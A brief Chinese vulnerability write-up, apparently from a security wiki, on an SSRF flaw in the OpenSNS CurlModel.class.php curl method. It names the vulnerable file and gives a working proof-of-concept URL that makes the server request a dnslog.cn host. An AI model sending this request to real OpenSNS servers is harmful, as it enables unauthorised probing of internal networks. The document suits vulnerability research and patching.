PeiQi文库

# OpenSNS CurlModel.class.php SSRF漏洞

# 漏洞描述

OpenSNS CurlModel.class.php文件中curl方法存在SSRF漏洞,通过漏洞攻击者可以探测内网信息

# 漏洞影响


# 网络测绘


# 漏洞复现

登录页面如下

img

存在漏洞的文件为 Application/Admin/Model/CurlModel.class.php

img

构造POC

/?s=weibo/share/shareBox&query=app=Admin%26model=Curl%26method=curl%26id=http://92aq2z.dnslog.cn
1

img

OpenSNS Application ShareController.class.php 远程命令执行漏洞